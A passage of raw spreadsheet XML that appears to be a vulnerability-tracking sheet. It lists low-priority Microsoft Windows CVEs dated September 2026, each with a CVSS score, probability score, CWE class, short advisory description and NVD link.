t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69367</t></is></c></row><row r="1891"><c r="A1891" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1891" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1891" s="5" t="inlineStr"><is><t>CVE-2026-69369</t></is></c><c r="D1891" s="5" t="n"><v>5.5</v></c><c r="E1891" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1891" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1891" s="5" t="inlineStr" /><c r="H1891" s="5" t="n"><v>0.003</v></c><c r="I1891" s="5" t="inlineStr" /><c r="J1891" s="5" t="inlineStr" /><c r="K1891" s="5" t="inlineStr" /><c r="L1891" s="5" t="inlineStr" /><c r="M1891" s="5" t="inlineStr" /><c r="N1891" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1891" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1891" s="5" t="inlineStr" /><c r="Q1891" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1891" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DNS allows an authorized attacker to disclose information locally.</t></is></c><c r="S1891" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69369</t></is></c></row><row r="1892"><c r="A1892" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1892" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1892" s="5" t="inlineStr"><is><t>CVE-2026-69376</t></is></c><c r="D1892" s="5" t="n"><v>5.5</v></c><c r="E1892" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1892" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1892" s="5" t="inlineStr" /><c r="H1892" s="5" t="n"><v>0.004</v></c><c r="I1892" s="5" t="inlineStr" /><c r="J1892" s="5" t="inlineStr" /><c r="K1892" s="5" t="inlineStr" /><c r="L1892" s="5" t="inlineStr" /><c r="M1892" s="5" t="inlineStr" /><c r="N1892" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1892" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1892" s="5" t="inlineStr" /><c r="Q1892" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1892" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="S1892" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69376</t></is></c></row><row r="1893"><c r="A1893" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1893" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1893" s="5" t="inlineStr"><is><t>CVE-2026-69390</t></is></c><c r="D1893" s="5" t="n"><v>5.5</v></c><c r="E1893" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1893" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1893" s="5" t="inlineStr" /><c r="H1893" s="5" t="n"><v>0.004</v></c><c r="I1893" s="5" t="inlineStr" /><c r="J1893" s="5" t="inlineStr" /><c r="K1893" s="5" t="inlineStr" /><c r="L1893" s="5" t="inlineStr" /><c r="M1893" s="5" t="inlineStr" /><c r="N1893" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1893" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1893" s="5" t="inlineStr" /><c r="Q1893" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1893" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t></is></c><c r="S1893" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69390</t></is></c></row><row r="1894"><c r="A1894" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1894" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1894" s="5" t="inlineStr"><is><t>CVE-2026-69403</t></is></c><c r="D1894" s="5" t="n"><v>5.5</v></c><c r="E1894" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1894" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1894" s="5" t="inlineStr" /><c r="H1894" s="5" t="n"><v>0.003</v></c><c r="I1894" s="5" t="inlineStr" /><c r="J1894" s="5" t="inlineStr" /><c r="K1894" s="5" t="inlineStr" /><c r="L1894" s="5" t="inlineStr" /><c r="M1894" s="5" t="inlineStr" /><c r="N1894" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1894" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1894" s="5" t="inlineStr" /><c r="Q1894" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1894" s="5" t="inlineStr"><is><t>Missing authorization in Windows SMB Server allows an authorized attacker to disclose information locally.</t></is></c><c r="S1894" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69403</t></is></c></row><row r="1895"><c r="A1895" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1895" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1895" s="5" t="inlineStr"><is><t>CVE-2026-69406</t></is></c><c r="D1895" s="5" t="n"><v>5.5</v></c><c r="E1895" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1895" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1895" s="5" t="inlineStr" /><c r="H1895" s="5" t="n"><v>0.005</v></c><c r="I1895" s="5" t="inlineStr" /><c r="J1895" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K189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95" s="5" t="inlineStr" /><c r="M1895" s="5" t="inlineStr" /><c r="N1895" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1895" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1895" s="5" t="inlineStr" /><c r="Q1895" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="R1895" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows Kernel allows an authorized attacker to disclose information locally.</t></is></c><c r="S1895" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69406</t></is></c></row><row r="1896"><c r="A1896" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1896" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1896" s="5" t="inlineStr"><is><t>CVE-2026-69453</t></is></c><c r="D1896" s="5" t="n"><v>5.5</v></c><c r="E1896" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1896" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1896" s="5" t="inlineStr" /><c r="H1896" s="5" t="n"><v>0.003</v></c><c r="I1896" s="5" t="inlineStr" /><c r="J1896" s="5" t="inlineStr" /><c r="K1896" s="5" t="inlineStr" /><c r="L1896" s="5" t="inlineStr" /><c r="M1896" s="5" t="inlineStr" /><c r="N1896" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1896" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1896" s="5" t="inlineStr" /><c r="Q1896" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1896" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Windows Search Component allows an authorized attacker to perform tampering locally.</t></is></c><c r="S1896" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69453</t></is></c></row><row r="1897"><c r="A1897" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1897" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1897" s="5" t="inlineStr"><is><t>CVE-2026-69457</t></is></c><c r="D1897" s="5" t="n"><v>5.5</v></c><c r="E1897" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1897" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1897" s="5" t="inlineStr" /><c r="H1897" s="5" t="n"><v>0.004</v></c><c r="I1897" s="5" t="inlineStr" /><c r="J1897" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K189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97" s="5" t="inlineStr" /><c r="M1897" s="5" t="inlineStr" /><c r="N1897" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1897" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1897" s="5" t="inlineStr" /><c r="Q1897" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1897" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="S1897" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69457</t></is></c></row><row r="1898"><c r="A1898" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1898" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1898" s="5" t="inlineStr"><is><t>CVE-2026-69504</t></is></c><c r="D1898" s="5" t="n"><v>5.5</v></c><c r="E1898" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1898" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1898" s="5" t="inlineStr" /><c r="H1898" s="5" t="n"><v>0.004</v></c><c r="I1898" s="5" t="inlineStr" /><c r="J1898" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1898"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98" s="5" t="inlineStr" /><c r="M1898" s="5" t="inlineStr" /><c r="N1898" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1898" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1898" s="5" t="inlineStr" /><c r="Q1898" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1898" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information locally.</t></is></c><c r="S1898" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69504</t></is></c></row><row r="1899"><c r="A1899" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1899" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1899" s="5" t="inlineStr"><is><t>CVE-2026-69527</t></is></c><c r="D1899" s="5" t="n"><v>5.5</v></c><c r="E1899" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1899" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1899" s="5" t="inlineStr" /><c r="H1899" s="5" t="n"><v>0.004</v></c><c r="I1899" s="5" t="inlineStr" /><c r="J1899" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1899"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899" s="5" t="inlineStr" /><c r="M1899" s="5" t="inlineStr" /><c r="N1899" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1899" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1899" s="5" t="inlineStr" /><c r="Q1899" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1899" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="S1899" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69527</t></is></c></row><row r="1900"><c r="A1900" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1900" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1900" s="5" t="inlineStr"><is><t>CVE-2026-69531</t></is></c><c r="D1900" s="5" t="n"><v>5.5</v></c><c r="E1900" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1900" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1900" s="5" t="inlineStr" /><c r="H1900" s="5" t="n"><v>0.003</v></c><c r="I1900" s="5" t="inlineStr" /><c r="J1900" s="5" t="inlineStr" /><c r="K1900" s="5" t="inlineStr" /><c r="L1900" s="5" t="inlineStr" /><c r="M1900" s="5" t="inlineStr" /><c r="N1900" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1900" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1900" s="5" t="inlineStr" /><c r="Q1900" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="R1900" s="5" t="inlineStr"><is><t>Unintended proxy or intermediary ('confused deputy') in Microsoft Windows Speech allows an authorized attacker to perform tampering locally.</t></is></c><c r="S1900" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69531</t></is></c></row><row r="1901"><c r="A1901" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1901" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1901" s="5" t="inlineStr"><is><t>CVE-2026-69554</t></is></c><c r="D1901" s="5" t="n"><v>5.5</v></c><c r="E1901" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1901" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1901" s="5" t="inlineStr" /><c r="H1901" s="5" t="n"><v>0.003</v></c><c r="I1901" s="5" t="inlineStr" /><c r="J1901" s="5" t="inlineStr" /><c r="K1901" s="5" t="inlineStr" /><c r="L1901" s="5" t="inlineStr" /><c r="M1901" s="5" t="inlineStr" /><c r="N1901" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1901" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1901" s="5" t="inlineStr" /><c r="Q1901" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R1901" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Microsoft Windows Search Component allows an authorized attacker to perform tampering locally.</t></is></c><c r="S1901" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69554</t></is></c></row><row r="1902"><c r="A1902" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1902" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1902" s="5" t="inlineStr"><is><t>CVE-2026-69568</t></is></c><c r="D1902" s="5" t="n"><v>5.5</v></c><c r="E1902" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1902" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1902" s="5" t="inlineStr" /><c r="H1902" s="5" t="n"><v>0.004</v></c><c r="I1902" s="5" t="inlineStr" /><c r="J1902" s="5" t="inlineStr" /><c r="K1902" s="5" t="inlineStr" /><c r="L1902" s="5" t="inlineStr" /><c r="M1902" s="5" t="inlineStr" /><c r="N1902" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1902" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1902" s="5" t="inlineStr" /><c r="Q1902" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1902" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Storage Spaces Controller allows an authorized attacker to disclose information locally.</t></is></c><c r="S1902" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69568</t></is></c></row><row r="1903"><c r="A1903" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1903" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1903" s="5" t="inlineStr"><is><t>CVE-2026-69609</t></is></c><c r="D1903" s="5" t="n"><v>5.5</v></c><c r="E1903" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1903" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1903" s="5" t="inlineStr" /><c r="H1903" s="5" t="n"><v>0.004</v></c><c r="I1903" s="5" t="inlineStr" /><c r="J1903" s="5" t="inlineStr" /><c r="K1903" s="5" t="inlineStr" /><c r="L1903" s="5" t="inlineStr" /><c r="M1903" s="5" t="inlineStr" /><c r="N1903" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1903" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1903" s="5" t="inlineStr" /><c r="Q1903" s="5" t="inlineStr"><is><t>CWE-125, CWE-193</t></is></c><c r="R1903" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.</t></is></c><c r="S1903" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69609</t></is></c></row><row r="1904"><c r="A1904" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1904" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1904" s="5" t="inlineStr"><is><t>CVE-2026-69616</t></is></c><c r="D1904" s="5" t="n"><v>5.5</v></c><c r="E1904" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1904" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1904" s="5" t="inlineStr" /><c r="H1904" s="5" t="n"><v>0.004</v></c><c r="I1904" s="5" t="inlineStr" /><c r="J1904" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K190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04" s="5" t="inlineStr" /><c r="M1904" s="5" t="inlineStr" /><c r="N1904" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1904" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1904" s="5" t="inlineStr" /><c r="Q1904" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1904" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to disclose information locally.</t></is></c><c r="S1904" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69616</t></is></c></row><row r="1905"><c r="A1905" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1905" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1905" s="5" t="inlineStr"><is><t>CVE-2026-69618</t></is></c><c r="D1905" s="5" t="n"><v>5.5</v></c><c r="E1905" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1905" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1905" s="5" t="inlineStr" /><c r="H1905" s="5" t="n"><v>0.004</v></c><c r="I1905" s="5" t="inlineStr" /><c r="J1905" s="5" t="inlineStr" /><c r="K1905" s="5" t="inlineStr" /><c r="L1905" s="5" t="inlineStr" /><c r="M1905" s="5" t="inlineStr" /><c r="N1905" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1905" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1905" s="5" t="inlineStr" /><c r="Q1905" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1905" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows SMB Client allows an authorized attacker to disclose information locally.</t></is></c><c r="S1905" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69618</t></is></c></row><row r="1906"><c r="A1906" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1906" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1906" s="5" t="inlineStr"><is><t>CVE-2026-69627</t></is></c><c r="D1906" s="5" t="n"><v>5.5</v></c><c r="E1906" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1906" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1906" s="5" t="inlineStr" /><c r="H1906" s="5" t="n"><v>0.004</v></c><c r="I1906" s="5" t="inlineStr" /><c r="J1906" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K190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06" s="5" t="inlineStr" /><c r="M1906" s="5" t="inlineStr" /><c r="N1906" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1906" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1906" s="5" t="inlineStr" /><c r="Q1906" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1906" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Remote Desktop Licensing Service allows an authorized attacker to disclose information locally.</t></is></c><c r="S1906" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69627</t></is></c></row><row r="1907"><c r="A1907" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1907" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1907" s="5" t="inlineStr"><is><t>CVE-2026-69672</t></is></c><c r="D1907" s="5" t="n"><v>5.5</v></c><c r="E1907" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1907" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1907" s="5" t="inlineStr" /><c r="H1907" s="5" t="n"><v>0.004</v></c><c r="I1907" s="5" t="inlineStr" /><c r="J1907" s="5" t="inlineStr" /><c r="K1907" s="5" t="inlineStr" /><c r="L1907" s="5" t="inlineStr" /><c r="M1907" s="5" t="inlineStr" /><c r="N1907" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1907" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1907" s="5" t="inlineStr" /><c r="Q1907" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="R1907" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows DNS allows an authorized attacker to disclose information locally.</t></is></c><c r="S1907" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69672</t></is></c></row><row r="1908"><c r="A1908" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1908" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1908" s="5" t="inlineStr"><is><t>CVE-2026-69674</t></is></c><c r="D1908" s="5" t="n"><v>5.5</v></c><c r="E1908" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1908" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1908" s="5" t="inlineStr" /><c r="H1908" s="5" t="n"><v>0.003</v></c><c r="I1908" s="5" t="inlineStr" /><c r="J1908" s="5" t="inlineStr" /><c r="K1908" s="5" t="inlineStr" /><c r="L1908" s="5" t="inlineStr" /><c r="M1908" s="5" t="inlineStr" /><c r="N1908" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1908" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1908" s="5" t="inlineStr" /><c r="Q1908" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R1908" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Modern Device Management (MDM) allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="S1908" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69674</t></is></c></row><row r="1909"><c r="A1909" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1909" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1909" s="5" t="inlineStr"><is><t>CVE-2026-69684</t></is></c><c r="D1909" s="5" t="n"><v>5.5</v></c><c r="E1909" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1909" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1909" s="5" t="inlineStr" /><c r="H1909" s="5" t="n"><v>0.005</v></c><c r="I1909" s="5" t="inlineStr" /><c r="J1909" s="5" t="inlineStr" /><c r="K1909" s="5" t="inlineStr" /><c r="L1909" s="5" t="inlineStr" /><c r="M1909" s="5" t="inlineStr" /><c r="N1909" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1909" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1909" s="5" t="inlineStr" /><c r="Q1909" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="R1909" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in Windows Error Reporting allows an authorized attacker to disclose information locally.</t></is></c><c r="S1909" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69684</t></is></c></row><row r="1910"><c r="A1910" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1910" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1910" s="5" t="inlineStr"><is><t>CVE-2026-69741</t></is></c><c r="D1910" s="5" t="n"><v>5.5</v></c><c r="E1910" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1910" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1910" s="5" t="inlineStr" /><c r="H1910" s="5" t="n"><v>0.004</v></c><c r="I1910" s="5" t="inlineStr" /><c r="J1910" s="5" t="inlineStr" /><c r="K1910" s="5" t="inlineStr" /><c r="L1910" s="5" t="inlineStr" /><c r="M1910" s="5" t="inlineStr" /><c r="N1910" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1910" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1910" s="5" t="inlineStr" /><c r="Q1910" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1910" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t></is></c><c r="S1910" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69741</t></is></c></row><row r="1911"><c r="A1911" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1911" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1911" s="5" t="inlineStr"><is><t>CVE-2026-69770</t></is></c><c r="D1911" s="5" t="n"><v>5.5</v></c><c r="E1911" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1911" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1911" s="5" t="inlineStr" /><c r="H1911" s="5" t="n"><v>0.004</v></c><c r="I1911" s="5" t="inlineStr" /><c r="J1911" s="5" t="inlineStr" /><c r="K1911" s="5" t="inlineStr" /><c r="L1911" s="5" t="inlineStr" /><c r="M1911" s="5" t="inlineStr" /><c r="N1911" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1911" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1911" s="5" t="inlineStr" /><c r="Q1911" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="R1911" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t></is></c><c r="S1911" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69770</t></is></c></row><row r="1912"><c r="A1912" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1912" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1912" s="5" t="inlineStr"><is><t>CVE-2026-69794</t></is></c><c r="D1912" s="5" t="n"><v>5.5</v></c><c r="E1912" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1912" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1912" s="5" t="inlineStr" /><c r="H1912" s="5" t="n"><v>0.004</v></c><c r="I1912" s="5" t="inlineStr" /><c r="J1912" s="5" t="inlineStr" /><c r="K1912" s="5" t="inlineStr" /><c r="L1912" s="5" t="inlineStr" /><c r="M1912" s="5" t="inlineStr" /><c r="N1912" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1912" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1912" s="5" t="inlineStr" /><c r="Q1912" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="R1912" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Encrypting File System (EFS) allows an authorized attacker to disclose information locally.</t></is></c><c r="S1912" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69794</t></is></c></row><row r="1913"><c r="A1913" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1913" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1913" s="5" t="inlineStr"><is><t>CVE-2026-69808</t></is></c><c r="D1913" s="5" t="n"><v>5.5</v></c><c r="E1913" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1913" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1913" s="5" t="inlineStr" /><c r="H1913" s="5" t="n"><v>0.004</v></c><c r="I1913" s="5" t="inlineStr" /><c r="J1913" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1913"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13" s="5" t="inlineStr" /><c r="M1913" s="5" t="inlineStr" /><c r="N1913" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1913" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1913" s="5" t="inlineStr" /><c r="Q1913" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1913" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.</t></is></c><c r="S1913" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69808</t></is></c></row><row r="1914"><c r="A1914" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1914" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1914" s="5" t="inlineStr"><is><t>CVE-2026-69862</t></is></c><c r="D1914" s="5" t="n"><v>5.5</v></c><c r="E1914" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1914" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1914" s="5" t="inlineStr" /><c r="H1914" s="5" t="n"><v>0.005</v></c><c r="I1914" s="5" t="inlineStr" /><c r="J1914" s="5" 